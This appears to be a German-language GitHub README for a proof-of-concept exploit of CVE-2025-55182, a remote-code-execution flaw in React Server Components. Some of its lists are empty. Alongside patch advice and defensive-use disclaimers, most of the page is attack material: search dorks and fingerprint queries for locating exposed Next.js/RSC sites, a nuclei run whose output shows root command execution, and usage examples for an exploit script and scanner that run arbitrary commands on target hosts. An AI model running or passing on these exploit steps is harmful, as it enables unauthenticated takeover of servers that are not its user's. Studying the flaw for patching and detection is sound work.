
Eine kritische Remote-Codeausführungs-Schwachstelle (RCE), die die Implementierung von React Server Components (RSC) in mehreren Paketen betrifft, einschließlich
CVE-2025-55182 ist eine kritische Schwachstelle zur Remotecodeausführung (RCE), die die Implementierung der React Server Components (RSC) in mehreren Paketen betrifft, darunter:
Die Schwachstelle besteht aufgrund einer unsicheren Deserialisierung von Nutzdaten, die über das interne Flight-Protokoll von RSC gesendet werden. Wenn bestimmte nicht vertrauenswürdige Eingaben über HTTP-Anfragen durch React Server Components fließen, kann eine serverseitige Codeausführung ausgelöst werden.
Die betroffenen Versionen umfassen:
Die gepatchten Versionen umfassen:
React Server Components akzeptieren clientseitige Anfragen, die im Backend geparst und deserialisiert werden. Die Schwachstelle entsteht durch unzureichende Kontrollen bei der Deserialisierung eingehender Daten, wodurch speziell präparierte Nutzdaten als ausführbare serverseitige Komponenten interpretiert werden können.
In diesem Fall kann auf dem Server beliebiger JavaScript-Code ausgeführt werden, was je nach Hosting-Umgebung und Berechtigungen zu einer vollständigen Kompromittierung des Servers führen kann.
Bei Ausnutzung könnte ein Angreifer in der Lage sein:
CVSS-Score: 10.0 – KRITISCH
Überprüfen, ob die Anwendung React Server Components offenlegt und ob betroffene Versionen verwendet werden.
curl -I https://target.com/?__rsc=1
Diese Suchbegriffe helfen dabei festzustellen, ob ein öffentlich zugängliches Repository oder eine Webanwendung auf RSC-Komponenten verweist.
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"
site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"
Nur für die interne Prüfung der Domäne Ihrer eigenen Organisation gedacht.
Prüft die Nutzung offengelegter Frameworks, nicht die Ausnutzung von Schwachstellen.
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"
Um defensives Scannen zu automatisieren, klonen Sie die vorlagenbasierte Erkennungslogik für Ihre eigene Infrastrukturbewertung:
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml
[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.
CVE-2025-55182.py)Vollwertiges RCE-Exploit-Skript, das beliebige Befehle ausführt und die Ausgabe abruft.
Verwendung:
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"
chmod +x scanner.sh
# Scan with default command (id)
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d example.com -c "whoami"
# With full URL
./scanner.sh -d https://example.com -c "uname -a"
-d, --domain - Zieldomäne/URL (erforderlich)-c, --command - Auszuführender Befehl (Standard: id)# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com
# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"
# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
Bash
curl
openssl
Die Vorlagen im Repository sind bestimmt für:
WICHTIG: Diese Vorlagen dürfen nur auf Systemen ausgeführt werden, die Ihnen gehören oder für deren Bewertung Sie autorisiert sind.
Die in diesem Repository enthaltenen Nuclei-Vorlagen sind ausschließlich bestimmt für:
Bitte stellen Sie sicher:
Führen Sie ein Upgrade auf eine der gepatchten Versionen durch:
Sicherheitsforscher • Cyber-Sicherheitstrainer • Bug-Bounty-Jäger
Motto: Zero Trust Full Secure 🚀
CVE-2025-55182 ist derzeit eine der kritischsten Bedrohungen für React-basierte Infrastrukturen. Aufgrund des trivialen Ausnutzungsvektors und der nicht authentifizierten Angriffsfläche wird ein sofortiges Patchen dringend empfohlen. Jede Organisation, die betroffene RSC-Versionen betreibt, sollte eine Notfall-Priorisierung in Betracht ziehen.
Dieses Repository und die Dokumentation dienen der defensiven Forschung und der Sicherheitsvalidierung von Assets, die Ihnen gehören. Jede missbräuchliche Verwendung kann rechtswidrig sein. Sie sind dafür verantwortlich, Gesetze und organisatorische Richtlinien einzuhalten.
Mit ❤️ erstellt von Cyber Leelawat
Zero Trust Full Secure 🎯🔐